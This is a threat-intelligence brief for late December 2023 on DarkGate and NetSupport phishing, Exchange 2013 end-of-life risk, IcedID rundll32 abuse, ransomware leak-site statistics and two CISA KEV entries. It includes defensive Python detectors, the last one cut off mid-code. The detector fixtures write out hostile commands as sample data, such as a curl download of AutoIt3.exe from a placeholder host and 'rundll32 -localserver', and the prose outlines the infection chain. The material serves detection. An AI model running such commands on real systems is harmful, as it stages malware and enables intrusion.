Cyber Intel Brief: December 21 – 27, 2023

By Eric Ford, Sr. Threat Intelligence Analyst

Estimated Reading Time: 18 minutes

Phishing Campaign Uses DarkGate RAT and NetSupport, ATI OSINT and Diligence Pays Dividends, and For Crying Out Loud–Stop Using Microsoft Exchange Server 2013

This week: a recent phishing campaign delivers the DarkGate RAT and uses NetSupport in attacks; we discuss the severe risk of not updating end-of-life software like Microsoft Exchange 2013, and we see how ATI open source intelligence and continued diligence often lead to the discovery of malicious activity. We take a deeper dive into this year’s ransomware landscape, and provide details of two new CVEs.

In our latest Cyber Intelligence Brief, Deepwatch ATI looks at new threats and techniques to deliver actionable intelligence for SecOps organizations. 

As a leading managed security platform, Deepwatch stands at the forefront of delivering actionable intelligence to keep pace with the ever-evolving threat landscape. Through the Deepwatch Adversary Tactics and Intelligence (ATI) team, we arm your organization with essential knowledge, giving you the power to proactively spot and neutralize risks, amplify your security protocols, and shield your financial stability.

Each week we look at in-house and industry threat intelligence and provide ATI analysis and perspective to shine a light on a spectrum of cyber threats.

Phishing Email and Fake Browser Update Campaigns Deliver DarkGate and NetSupport Remote Access Trojans

Windows SmartScreen CVE-2023-36025 – DarkGate – Remote Access Trojan – NetSupport RAT – BattleRoyal Intrusion Set – Phishing Email Campaign – Fake Browser Updates – Industries/All

Threat Analysis

In the latter half of 2023, Proofpoint observed at least 20 email campaigns spreading the DarkGate malware, a new Remote Access Trojan (RAT) and loader. These campaigns all had similarities in tactics, techniques, procedures (TTPs), and arsenal, resulting in Proofpoint tracking the activity as an Intrusion Set named “BattleRoyal.” This Intrusion Set led to the discovery of a fake browser update campaign, identified as RogueRaticate/FakeSG, that delivered the DarkGate malware.

Phishing Emails

Between September and November 2023, Proofpoint’s research has identified at least 20 distinct email campaigns using DarkGate. These campaigns are recognizable by their use of specific GroupIDs, namely “PLEX,” “ADS5”, “user_871236672”, and “usr_871663321”. The email campaigns involved tens of thousands of emails targeting various industries, primarily in the USA and Canada. These emails were crafted to entice recipients into triggering the malware download. 

One of the first campaigns identified was notable for using more than one traffic delivery system (TDS). The emails in this campaign contained 404 TDS URLs that, if clicked by the user, redirected to the Keitaro TDS, which in turn downloaded an internet shortcut (.URL) file. While other parts of the attack chain from this cluster changed or varied, .URL files were involved in every campaign and exploited CVE-2023-36025, a vulnerability in Windows SmartScreen. The BattleRoyal Intrusion Set exploited this vulnerability more than any other actor observed in Proofpoint telemetry data. Notably, this threat activity cluster exploited CVE-2023-36025 before it was published by Microsoft.

The .URL file, when a recipient double-clicked it, downloaded a zipped VBS script. The script, in turn, downloaded and executed several shell commands (cmd.exe). The shell commands:

  • Created a directory on C: drive
  • Copied curl.exe from the system folder to this new directory
  • Used curl to download Autoit3.exe
  • Used curl to download and save an AutoIT script
  • Ran the downloaded AutoIT script with the downloaded AutoIT interpreter. 
  • The AutoIT script then ran the embedded DarkGate malware.

From late November to early December, Proofpoint observed the threat actor(s) replacing DarkGate with NetSupport, a legitimate remote access tool. 

Besides the payload switch, another notable change in this campaign, reflecting the gradual evolution of the threat actors’ tradecraft, is the use of two .URL files instead of one.

In an example campaign on 28 November 2023, the emails contained URLs (hxxps[:]//adclick.g.doubleclick[.]net) that, if clicked by the user, redirected to the Keitaro TDS:

  • Keitaro TDS downloaded an Internet shortcut (.URL) file.
  • The Internet shortcut, if double-clicked, downloaded another Internet shortcut (.URL) file.
  • The second Internet shortcut linked to a NetSupport executable. 
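The shortcut chain above (a .URL that fetches a second .URL, which links to an executable) is the kind of structure a mail gateway or sandbox can check for statically before any file is opened. Below is an added example, not code from Proofpoint or from this brief, that parses Internet Shortcut files with Python’s configparser, follows shortcut-to-shortcut hops, and flags targets by scheme and file extension. The shortcut bodies, file names and hosts are constructed placeholders, not observed indicators:

```python
"""Parse Windows Internet Shortcut (.URL) files and trace shortcut-to-shortcut chains.

Added example (not from the Proofpoint report). The two-hop chain below mirrors the
chain described above: shortcut -> second shortcut -> remote executable. All file
names, hosts and bodies are constructed placeholders, not observed indicators.
"""
import configparser
from urllib.parse import urlparse

# Constructed shortcut bodies keyed by file name. '.invalid' is a reserved TLD.
SAMPLE_SHORTCUTS = {
    "invoice.url": "[InternetShortcut]\r\nURL=https://tds.example.invalid/stage2.url\r\n",
    "stage2.url": "[InternetShortcut]\r\nURL=https://tds.example.invalid/remote-tool.exe\r\n",
    "intranet.url": "[InternetShortcut]\r\nURL=https://intranet.example.com/portal\r\nIconIndex=0\r\n",
}

# Targets that make a shortcut a delivery step rather than a bookmark.
SUSPICIOUS_SUFFIXES = (".url", ".exe", ".vbs", ".js", ".msi", ".zip", ".dll")


def parse_url_shortcut(text: str) -> dict:
    """Return the [InternetShortcut] fields of a .URL file; raise ValueError if malformed."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case as written (URL, IconFile, ...)
    cp.read_string("\n".join(text.splitlines()))  # normalise CRLF line endings
    if "InternetShortcut" not in cp:
        raise ValueError("missing [InternetShortcut] section")
    fields = dict(cp["InternetShortcut"])
    if "URL" not in fields:
        raise ValueError("missing URL field")
    return fields


def classify_target(url: str) -> list:
    """Return the reasons a shortcut target looks like a delivery step (empty list = benign)."""
    reasons = []
    parsed = urlparse(url.strip())
    scheme = parsed.scheme.lower()
    path = parsed.path.lower()
    if scheme not in ("http", "https"):
        reasons.append(f"non-web scheme '{scheme or '<none>'}'")
    if path.endswith(SUSPICIOUS_SUFFIXES):
        reasons.append(f"target ends in '{path[path.rfind('.'):]}'")
    return reasons


def trace_chain(name: str, shortcuts: dict, max_depth: int = 5) -> list:
    """Follow shortcut -> shortcut hops, resolving each hop by the file name in the URL path.

    Returns the ordered list of targets; stops at the first target that is not a
    known .URL file. max_depth guards against a shortcut that points at itself.
    """
    chain = []
    current = name
    for _ in range(max_depth):
        target = parse_url_shortcut(shortcuts[current])["URL"]
        chain.append(target)
        next_name = urlparse(target).path.rsplit("/", 1)[-1]
        if not next_name.lower().endswith(".url") or next_name not in shortcuts:
            break
        current = next_name
    return chain


def assess(name: str, shortcuts: dict) -> dict:
    """Combine chain length and per-hop classification into one verdict for a shortcut."""
    chain = trace_chain(name, shortcuts)
    reasons = []
    for hop, target in enumerate(chain, start=1):
        reasons.extend(f"hop {hop}: {r}" for r in classify_target(target))
    if len(chain) > 1:
        reasons.append(f"shortcut chain of {len(chain)} hops")
    return {"file": name, "chain": chain, "reasons": reasons, "suspicious": bool(reasons)}


if __name__ == "__main__":
    for file_name in SAMPLE_SHORTCUTS:
        verdict = assess(file_name, SAMPLE_SHORTCUTS)
        print(f"{verdict['file']}: suspicious={verdict['suspicious']} {verdict['reasons']}")
```

Shortcut files are INI-formatted, so the parser keeps the URL key’s case and disables interpolation so that percent-encoded URLs survive. The extension rule is deliberately narrow: a bookmark to a web page passes, while a shortcut that hands off to another shortcut or to an executable does not.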

Fake Browser Updates

The RogueRaticate/FakeSG campaign used compromised websites to present end users with fake browser update requests, using different templates depending on which browser the victim was running, and dropped a DarkGate payload carrying the “ADS5” GroupID. On each compromised website, the threat actor injected a request to an actor-controlled domain that used .css steganography to conceal the malicious code.

Upon visiting a compromised website, the concealed code makes a request to an actor-controlled Keitaro domain that would filter out unwanted traffic. Users who passed the traffic inspection would be presented with highly convincing fake browser update notifications. 

These notifications are carefully crafted to mimic the look and feel of legitimate update prompts from popular browsers like Chrome, Firefox, or Edge. The design of these fake updates is sophisticated and up-to-date, often matching the latest user interface elements of the respective browsers. For instance, a Chrome user might see a pop-up that closely resembles Chrome’s own update notification, complete with familiar color schemes, fonts, and logos. 

The notification typically urges the user to download an ‘urgent’ or ‘critical’ update, citing improved security or enhanced features. The language used is persuasive and creates a sense of immediacy, prompting the user to act quickly. To add to the authenticity, the notification might appear at moments that seem contextually appropriate, such as when a user first opens the browser or navigates to a new page.

When a user clicks on the ‘update’ button in these fake prompts, instead of receiving a genuine browser update, they download a similar .URL file and follow the attack chain from that point to deliver DarkGate, as observed in the email campaigns.

This particular Intrusion Set is notable for employing multiple attack chains and payloads. The DarkGate payload is capable of stealing confidential information and downloading other malware payloads. The NetSupport payload is used by threat actors to gain control over an infected host, install additional malware, and facilitate lateral movement throughout the compromised environment.

What makes this Intrusion Set unique is the actor’s use of both email and fake update lures in their attack chains. This aligns with the overall trend of cybercriminals adopting new and varied attack chains, including TDS tools, to deliver malware. The actor’s use of both email and fake update lures shows that they are employing multiple social engineering techniques to trick users into installing the final payload.

Risk & Impact Assessment

The emergence and evolution of this Intrusion Set, particularly its use of DarkGate and subsequent switch to NetSupport RAT, presents significant risks and impacts to business operations. The sophisticated nature of the phishing campaigns and the deceptive fake browser updates increase the likelihood of successful breaches. These tactics can lead to the exfiltration of sensitive data, installation of additional malware, and potential compromise of critical systems. The shift to using NetSupport RAT, a tool that can be perceived as legitimate, further complicates detection and response efforts. This evolving threat landscape underscores the vulnerability of even well-protected networks, as threat actors continuously adapt and refine their methods to exploit new vulnerabilities and bypass security measures. The impact of such breaches extends beyond immediate data loss, encompassing long-term reputational damage, loss of customer trust, and potential disruption of business operations.

Assessing the material impact of these threats, it is evident that there is a considerable likelihood of a significant adverse effect on a company’s business operations, results of operations, or financial condition. The successful infiltration and persistence of such malware within corporate networks can lead to substantial operational disruptions, including downtime, loss of productivity, and the diversion of resources to incident response and recovery efforts. Financially, the implications are multifaceted, ranging from direct costs associated with breach mitigation, legal liabilities, and potential regulatory fines to indirect costs like increased insurance premiums and investment in strengthening cybersecurity infrastructure. 

For companies in sectors where data integrity and security are paramount, the impact can be even more pronounced, potentially leading to loss of competitive advantage and long-term financial repercussions. Therefore, it is crucial for organizations to recognize the severity of these risks and proactively implement comprehensive security measures to mitigate potential material impacts on their operations and financial health.

Source Material: Proofpoint, BattleRoyal, DarkGate Cluster Spreads via Email and Fake Browser Updates

The Severe Risks of Continuing to Use Microsoft Exchange Server 2013

Microsoft Exchange Server 2013 – Software End-of-life Risks – Ransomware – Vulnerability Exploitation – Industries/All

Threat Analysis

The cyber threat landscape surrounding the use of Microsoft Exchange Server 2013 has evolved significantly, especially following its transition to end-of-life status in April 2023. Recent trends have shown a noticeable increase in ransomware attacks targeting organizations using Exchange Server 2013. This uptick is particularly alarming given the server’s widespread adoption across various sectors, including government and corporate entities. A typical configuration for these attacks has been identified as Exchange Server 2013 with Outlook Web Access (OWA) enabled. While common for user convenience, this configuration exposes organizations to risks.

The transition of Microsoft Exchange Server 2013 to end-of-life has critical implications for security, as it means no further security updates or patches will be released by Microsoft for this version. The cessation of security updates exposes organizations using Exchange Server 2013 to emerging threats. Without ongoing updates, these systems become increasingly vulnerable to exploitation by cybercriminals. There is a concerning trend where organizations believe their systems are secure if they have applied all available security updates. However, the end-of-life status of Exchange Server 2013 means that new vulnerabilities discovered post-support will not be addressed, leaving systems at risk.

Furthermore, Microsoft does not test new security vulnerabilities on end-of-life versions of Exchange Server. When a new vulnerability is discovered, the end-of-life version of Exchange Server will not be listed as vulnerable. Because of this policy, no new vulnerabilities have been recorded in the Common Vulnerabilities and Exposures (CVE) databases for Exchange Server 2013. This absence can create a misleading perception of security. The absence of CVE entries does not mean the absence of vulnerabilities, as the maxim goes: “The absence of evidence is not evidence of absence.” In reality, it reflects the cessation of official vulnerability assessments by Microsoft, likely leaving undiscovered or undisclosed vulnerabilities in the system.

Instances have been observed where ransomware attacks successfully penetrated organizations where the apparent entry vector was a fully patched Exchange Server 2013 server with Outlook Web Access enabled. These incidents are likely the result of known vulnerabilities, given that various post-authentication Exchange Server vulnerabilities exist. However, the possibility of zero-day exploits being used cannot be ruled out, given the lack of ongoing security updates and assessments.

Exchange Server 2013 marks a significant point in the evolution of Microsoft’s Exchange Server line, introducing features and architectural changes not present in earlier versions like Exchange 2007. Some features intended to enhance functionality and integration inadvertently introduced new security challenges. Exchange Server 2013 is deeply integrated with Active Directory, which, while beneficial for system management, creates significant security risks. This integration often makes it easier for threat actors to escalate privileges once they have compromised the Exchange Server.

The codebase for Exchange Server 2013 includes components added for Exchange Online, which have been linked to various security issues. These components introduced the ProxyLogon, ProxyShell, and ProxyNotShell vulnerabilities. Despite these known vulnerabilities, Exchange Server 2013 continues to be widely used in various sectors, including critical ones like government and finance. This widespread use, coupled with the unique vulnerabilities, creates a substantial risk profile.

Despite its end-of-life status, Exchange Server 2013 remains widely used worldwide, including by many organizations in critical sectors such as government, finance, and healthcare. Many organizations (almost 25,000) continue to use Exchange Server 2013 with Outlook Web App enabled, due to the complexities and costs associated with upgrading to newer versions. This reluctance or delay in upgrading exacerbates the security risks. There is a general underestimation of the risks associated with using end-of-life software. Many organizations might not fully comprehend the security implications of continuing to use Exchange Server 2013. The reliance on vulnerability scanners that do not flag issues with end-of-life software further contributes to a false sense of security among these organizations.
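Vulnerability scanners that stay silent on end-of-life software leave the end-of-support check to the asset owner. The added example below, not part of the source article, applies that check to an Exchange inventory: it parses the “Version 15.0 (Build n.n)” form in which Exchange reports its AdminDisplayVersion, maps the 15.x product lines to Microsoft’s published end-of-support dates, and raises the severity when an unsupported server also exposes Outlook Web App. The inventory records, host names and build numbers are constructed, and REPORT_DATE is an assumed reference date:

```python
"""Flag Exchange servers past end of support, with internet-facing OWA as an aggravator.

Added example, not from the source article. Inventory records are constructed; the
version strings follow the "Version 15.0 (Build n.n)" form that Exchange reports as
AdminDisplayVersion. End-of-support dates are Microsoft's published dates.
"""
import re
from datetime import date

REPORT_DATE = date(2023, 12, 27)  # assumed reference date (the week of this brief)

# Exchange 15.x product lines keyed by (major, minor). Exchange 2013 left support on
# 11 April 2023, after which no security updates or CVE assessments are produced for it.
EXCHANGE_PRODUCTS = {
    (15, 0): ("Exchange Server 2013", date(2023, 4, 11)),
    (15, 1): ("Exchange Server 2016", date(2025, 10, 14)),
    (15, 2): ("Exchange Server 2019", date(2025, 10, 14)),
}

VERSION_RE = re.compile(r"Version\s+(\d+)\.(\d+)\s+\(Build\s+(\d+)\.(\d+)\)")

# Constructed inventory; host names and build numbers are placeholders.
INVENTORY = [
    {"host": "mail01.corp.example", "version": "Version 15.0 (Build 1497.1)", "owa_internet_exposed": True},
    {"host": "mail02.corp.example", "version": "Version 15.2 (Build 1258.1)", "owa_internet_exposed": True},
    {"host": "mail03.corp.example", "version": "Version 15.0 (Build 1497.1)", "owa_internet_exposed": False},
    {"host": "legacy.corp.example", "version": "Version 8.3 (Build 83.6)", "owa_internet_exposed": False},
]


def parse_version(text: str) -> tuple:
    """Parse 'Version 15.0 (Build 1497.1)' into (15, 0, 1497, 1); raise ValueError otherwise."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"unrecognised Exchange version string: {text!r}")
    return tuple(int(g) for g in m.groups())


def assess_server(record: dict, today: date) -> dict:
    """Return findings and a severity for one inventory record."""
    major, minor, _build, _rev = parse_version(record["version"])
    product, end_of_support = EXCHANGE_PRODUCTS.get(
        (major, minor), (f"Exchange {major}.{minor}", None))
    owa_exposed = bool(record.get("owa_internet_exposed"))
    past_support = end_of_support is not None and today >= end_of_support
    findings = []
    if end_of_support is None:
        findings.append(f"{product} is not in the product table; treat as unsupported until verified")
    elif past_support:
        findings.append(f"{product} reached end of support on {end_of_support.isoformat()}; "
                        "no further security updates or CVE assessments")
    if owa_exposed:
        findings.append("Outlook Web App is reachable from the internet")
    # Unsupported code plus an internet-facing logon surface is the combination
    # the text above associates with ransomware entry.
    if past_support and owa_exposed:
        severity = "critical"
    elif past_support or end_of_support is None:
        severity = "high"
    elif owa_exposed:
        severity = "medium"
    else:
        severity = "info"
    return {"host": record["host"], "product": product, "severity": severity, "findings": findings}


def assess_inventory(records, today: date) -> list:
    """Assess every record and return results ordered by severity, most urgent first."""
    order = {"critical": 0, "high": 1, "medium": 2, "info": 3}
    return sorted((assess_server(r, today) for r in records),
                  key=lambda r: (order[r["severity"]], r["host"]))


if __name__ == "__main__":
    for result in assess_inventory(INVENTORY, REPORT_DATE):
        print(f"{result['severity']:8} {result['host']:22} {result['product']}")
        for finding in result["findings"]:
            print(f"         - {finding}")
```

A version that is not in the table is ranked high rather than ignored, since an unrecognised build on a mail server is more likely a forgotten system than a new one.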

Additionally, Exchange Server 2013 honeypot networks have recorded frequent attacks over the past few months in which threat actors used valid credentials to log in to Outlook Web App, suggesting that threat actors actively seek and exploit vulnerabilities in Exchange Server 2013, even without publicly known CVEs.

The end-of-life status of Exchange Server 2013 has left it without critical security updates, making it increasingly vulnerable to exploitation. There has been a marked increase in ransomware attacks targeting Exchange Server 2013, exploiting its unique vulnerabilities and integration with critical systems like Active Directory. Many organizations, including those in sensitive sectors, continue to use Exchange Server 2013, often underestimating the risks associated with end-of-life software. The widespread practice of exposing Outlook Web Access (OWA) to the internet has notably increased the attack surface, making organizations more susceptible to cyber-attacks. 

It is imperative for organizations to recognize the heightened risks associated with Exchange Server 2013 and to reassess their reliance on this end-of-life software. Organizations must adopt proactive measures, including upgrading to supported versions of Exchange Server, implementing robust security practices, and regularly reviewing their cybersecurity posture.

Risk & Impact Assessment

The continued operation of Microsoft Exchange Server 2013 in its end-of-life phase exposes organizations to significant cybersecurity risks, primarily from heightened vulnerability to attacks like ransomware. This vulnerability is intensified by the server’s integration with critical systems, potentially leading to escalated breaches and severe data compromises. The impacts of such incidents extend beyond data loss to include operational disruptions, reputational damage, and regulatory non-compliance, especially in sensitive sectors like government, finance, and healthcare. These breaches can result in substantial financial losses, legal liabilities, and erosion of customer trust.

Assessing the material impact on a company’s business operations and financial condition reveals a high likelihood. The probability of a cyber-attack exploiting known vulnerabilities in Exchange Server 2013 and the potential severity of such an incident suggests a material impact is not only possible but probable. Companies may face considerable direct costs from operational disruptions and breach remediation, as well as indirect costs like reputational harm and loss of market confidence. For organizations in regulated industries, the compliance risks and associated penalties further heighten the potential for a material financial impact, underscoring the need for urgent and comprehensive risk management strategies.

Source Material: Kevin Beaumont, The ticking time bomb of Microsoft Exchange Server 2013

Deepwatch’s Open-source Intelligence Collection and Reporting Frequently Leads to the Discovery of Malicious Activity

IcedID – Cobalt Strike – Trojan – Rundll32 – Domain Compromise – Abnormal Parent Spawning Rundll32 – Industries/All

Threat Analysis

Our original report, “IcedID Leads to Domain Compromise, Cobalt Strike, & Data Exfiltration,” published in early January 2023, is a good example of the follow-up work that Deepwatch’s Adversary Tactics and Intelligence team does after publishing a report. While that report focused on an IcedID infection leading to domain compromise, our follow-up work led us to observe a technique used in that campaign, an abnormal parent process spawning Rundll32, in several customer environments.

The Abnormal Parent Spawning “Rundll32” technique involves a parent process, like explorer.exe, spawning the child process rundll32.exe with an uncommon argument, such as “-localserver.” Cybercriminals often use this technique to execute malicious code on a victim’s computer.

For instance, a threat actor would use explorer.exe because it’s a legitimate and commonly trusted Windows process typically associated with the Windows File Explorer. Its ubiquity and trust within the operating system make it an ideal candidate for initiating less suspicious actions. The child process, rundll32.exe, is another legitimate Windows utility. Its primary function is to load and run functions stored in Dynamic Link Library (DLL) files. However, rundll32.exe can also be employed for malicious activities due to its versatility.

Using uncommon arguments, such as “-localserver” to load malicious registered COM objects, is a key aspect of this tactic. Regular day-to-day computer operations typically do not use these arguments, so their presence can strongly indicate an unusual and potentially malicious use of rundll32.exe. Threat actors favor this method mainly because it offers a degree of stealth: using legitimate system processes helps to camouflage malicious activity, making it harder for users to notice and potentially allowing it to bypass conventional security software.
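The lineage described above (a trusted parent such as explorer.exe launching rundll32.exe with “-localserver”) and the DarkGate chain from the first section (script host to cmd.exe, curl.exe copied out of the system folder, AutoIt3.exe run from a staging directory) are both visible in process-creation telemetry. The added example below, which is not Deepwatch’s detection content, evaluates constructed Sysmon-style events against those patterns; all paths, hosts and the CLSID placeholder are assumptions, not observed indicators:

```python
"""Score process-creation events for the lineage abuses described in this brief.

Added example, not Deepwatch's detection content. It covers two passages: the
DarkGate email chain (script host -> cmd.exe -> copied curl.exe -> AutoIt interpreter)
and the abnormal-parent "rundll32 -localserver" technique from the IcedID report.
Events are constructed Sysmon-style records; paths and the CLSID are placeholders.
"""
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PROGRAM_FILES = ("c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE_HINTS = ("\\temp\\", "\\appdata\\", "\\users\\public\\", "\\downloads\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

SAMPLE_EVENTS = [
    # 0. abnormal parent: explorer.exe launching rundll32 with the uncommon -localserver switch
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": "rundll32.exe -localserver {PLACEHOLDER-CLSID}"},
    # 1. benign: explorer.exe opening a Control Panel item through rundll32
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": "rundll32.exe shell32.dll,Control_RunDLL"},
    # 2. VBS script host driving cmd.exe to create a staging directory on C:
    {"parent_image": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c mkdir C:\stage"},
    # 3. curl.exe copied out of System32 and run from the staging directory
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\stage\curl.exe",
     "command_line": r"curl.exe -o C:\stage\Autoit3.exe https://download.example.invalid/a"},
    # 4. AutoIt interpreter run from the staging directory with a downloaded script
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\stage\Autoit3.exe",
     "command_line": r"Autoit3.exe C:\stage\script.au3"},
    # 5. rundll32 loading a DLL dropped into a temporary folder
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\loader.dll,Start"},
    # 6. benign: curl.exe from its normal location
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe https://intranet.example.com/health"},
]


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def evaluate(event: dict) -> list:
    """Return the detection names that fire for one event (empty list = nothing of interest)."""
    image = event["image"].lower()
    name = _basename(image)
    parent = _basename(event["parent_image"])
    cmd = event["command_line"].lower()
    hits = []
    # Uncommon switch: -localserver loads a registered COM object rather than a DLL export.
    if name == "rundll32.exe" and "-localserver" in cmd:
        hits.append(f"rundll32 -localserver spawned by {parent}")
    # Loader utilities pointed at a DLL in a user-writable location.
    if name in ("rundll32.exe", "regsvr32.exe") and ".dll" in cmd \
            and any(h in cmd for h in USER_WRITABLE_HINTS):
        hits.append(f"{name} loading a DLL from a user-writable path")
    # curl.exe ships in System32; a copy elsewhere is the staging step in the chain.
    if name == "curl.exe" and not image.startswith(SYSTEM_DIRS):
        hits.append(f"curl.exe running from non-system path {event['image']}")
    # AutoIt is a legitimate interpreter, but not when it appears outside Program Files.
    if name == "autoit3.exe" and not image.startswith(PROGRAM_FILES):
        hits.append(f"AutoIt interpreter running outside Program Files ({event['image']})")
    # Script hosts spawning a shell is how the VBS stage ran its commands.
    if name == "cmd.exe" and parent in SCRIPT_HOSTS:
        hits.append(f"cmd.exe spawned by script host {parent}")
    return hits


def scan(events) -> list:
    """Evaluate a sequence of events; return (index, hits) for each event that fired."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := evaluate(ev))]


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {'; '.join(hits)}")
```

Each rule keys on the child’s name plus either the parent’s name, the image path, or one argument, which keeps the benign rows quiet (a Control Panel applet launched through rundll32, curl.exe from its normal location). The -localserver rule deliberately ignores the CLSID so that it does not depend on any particular COM object.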

To underscore the importance of our reporting, customers must recognize that these reports are not just educational but are instrumental in proactive defense. By staying informed through our detailed analyses, customers can better understand the evolving threat landscape and enhance their security posture. Our ability to detect and report on tactics like the ‘Abnormal Parent Spawning Rundll32’ demonstrates the value of continuous vigilance and intelligence-led security strategies. We encourage all our customers to regularly engage with our reports to avoid potential threats and safeguard their digital environments effectively.

Overview of Initial Reporting

The initial infection method employed by the cybercriminal involved the victim opening an archive containing an ISO file, which, when mounted, creates a virtual disk. The victim navigated to the virtual disk and clicked the only file visible, an LNK file. The LNK file runs a batch file that drops a DLL into a temporary folder and runs it with rundll32.exe; the DLL creates network connections to IcedID-related domains and downloads the IcedID payload. The IcedID payload is loaded into the process and establishes persistence on the machine. After gaining access with IcedID, the threat actor used regsvr32.exe to load the file “cuaf.dll,” a Cobalt Strike beacon, and moved laterally through the network.

Risk & Impact Assessment

The implications of this technique are significant. The primary concern is the potential compromise of the system, where malicious code can be executed without immediate detection. This technique could lead to various detrimental outcomes, such as data theft, data damage, or the establishment of persistent access to the system for ongoing exploitation. This tactic’s ability to evade detection increases the likelihood of a successful attack and prolongs the attacker’s presence within the system, potentially leading to more severe consequences over time.

Source Material: Cybereason, Threat Analysis: From IcedID to Domain Compromise

Data Leak Sites List 2,436 Victims in 2023

Lockbit Ransomware – CL0P Ransomware – ALPHV Ransomware – Black Basta Ransomware – Play Ransomware – Ransomware – Manufacturing – Professional Services – Information – Finance and Insurance – Educational Services

Our comprehensive analysis of the ransomware leak sites in 2023 reveals a complex and evolving threat environment, with 2,436 victims listed. Key findings from the data indicate that ransomware remains a significant and growing threat to a wide range of industries and countries, with specific industries and regions being particularly vulnerable.

The ransomware ecosystem is primarily dominated by a few key players – Lockbit, CL0P, ALPHV, Black Basta, and Play. Collectively, these groups account for a substantial portion of the attacks, each exhibiting unique targeting patterns and preferences.

Manufacturing, professional, scientific, and technical services, information technology, finance and insurance, and educational services emerged as the most targeted industries. These industries are possibly chosen due to their critical operational roles, the sensitivity of the data they handle, and their perceived ability to pay ransoms.

The United States, the United Kingdom, Canada, Germany, and France are the most affected countries, highlighting a focus on economically developed regions with high levels of digital infrastructure. This concentration suggests that ransomware groups may strategically target these regions due to the lucrative opportunities for extortion.

Each ransomware group has demonstrated distinct preferences for specific industries, potentially reflecting their operational strategies. For instance, Lockbit heavily listed the manufacturing industry, while CL0P listed the finance and insurance industry the most.

Our analysis strives to be comprehensive, utilizing the most current data available from our dark web monitoring platform. However, it is crucial to acknowledge this data set’s inherent discrepancies. Despite our best efforts, the data set may include victims who are not listed on leak sites or were previously listed. Additionally, we may have omitted victims we could not verify. As the data set does not include information about the industry, we do our best to classify the victims based on the NAICS industry classification system. This manual effort may introduce other discrepancies, such as misclassifying the industry. We also recognize that our data set does not represent the full scope of ransomware victims, as it only reflects those listed on leak sites, and groups do not list every victim they attacked on their sites. As such, while we believe our analysis provides valuable insights, it should be considered with an understanding of these potential discrepancies. Read the full report for complete details.

CISA Adds 2 CVEs to Known Exploited Vulnerabilities Catalog

QNAP VioStor NVR CVE-2023-47565 – FXC AE1021, AE1021PE CVE-2023-49897

In the past week, CISA added two CVEs to its Known Exploited Vulnerabilities Catalog, impacting QNAP and FXC products. These vulnerabilities can have severe consequences, as they allow authenticated users to execute commands via a network. Whether these vulnerabilities are used in ransomware campaigns is currently unknown. The Adversary Tactics and Intelligence team recommends that mitigation be completed by the “Due Date” set by CISA.

CVE-2023-47565
  • Vendor: QNAP
  • Product: VioStor NVR
  • Description: QNAP VioStor NVR contains an OS command injection vulnerability that allows authenticated users to execute commands via a network.
  • CISA Due Date: 1-11-2024
  • Used in Ransomware Campaigns: Unknown

CVE-2023-49897
  • Vendor: FXC
  • Product: AE1021 and AE1021PE
  • Description: FXC AE1021 and AE1021PE contain an OS command injection vulnerability that allows authenticated users to execute commands via a network.
  • CISA Due Date: 1-11-2024
  • Used in Ransomware Campaigns: Unknown
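CISA publishes the catalog as a JSON feed, and the due date is what drives remediation priority. The added example below, not part of this brief, reproduces the two entries above in the feed’s own field names (cveID, vendorProject, product, dueDate, knownRansomwareCampaignUse), matches them against a constructed asset inventory, and ranks the hits by days remaining to the due date. The inventory, asset names and REPORT_DATE are assumptions:

```python
"""Match CISA Known Exploited Vulnerabilities entries against an asset inventory.

Added example, not from the brief. The two records below reproduce the catalog entries
above using the field names of CISA's KEV JSON feed; in production the list would be
loaded from https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json.
The inventory and REPORT_DATE are constructed.
"""
from datetime import date

REPORT_DATE = date(2023, 12, 27)  # assumed reference date (the week of this brief)

KEV_SAMPLE = {"vulnerabilities": [
    {"cveID": "CVE-2023-47565", "vendorProject": "QNAP", "product": "VioStor NVR",
     "shortDescription": "QNAP VioStor NVR contains an OS command injection vulnerability "
                         "that allows authenticated users to execute commands via a network.",
     "dueDate": "2024-01-11", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2023-49897", "vendorProject": "FXC", "product": "AE1021 and AE1021PE",
     "shortDescription": "FXC AE1021 and AE1021PE contain an OS command injection vulnerability "
                         "that allows authenticated users to execute commands via a network.",
     "dueDate": "2024-01-11", "knownRansomwareCampaignUse": "Unknown"},
]}

# Constructed inventory; asset names and the third vendor are placeholders.
INVENTORY = [
    {"asset": "cam-nvr-01", "vendor": "QNAP", "product": "VioStor NVR"},
    {"asset": "branch-rtr-07", "vendor": "FXC", "product": "AE1021PE"},
    {"asset": "core-sw-01", "vendor": "ExampleVendor", "product": "Widget Switch"},
]


def _matches(entry: dict, asset: dict) -> bool:
    """Vendor must match exactly (case-insensitive); product matches if either name contains the other."""
    if entry["vendorProject"].lower() != asset["vendor"].lower():
        return False
    kev_product, inv_product = entry["product"].lower(), asset["product"].lower()
    return inv_product in kev_product or kev_product in inv_product


def match_inventory(kev: dict, inventory, today: date) -> list:
    """Return one row per (asset, KEV entry) match, most urgent due date first."""
    rows = []
    for entry in kev["vulnerabilities"]:
        due = date.fromisoformat(entry["dueDate"])
        for asset in inventory:
            if _matches(entry, asset):
                rows.append({
                    "asset": asset["asset"],
                    "cveID": entry["cveID"],
                    "dueDate": entry["dueDate"],
                    "days_left": (due - today).days,
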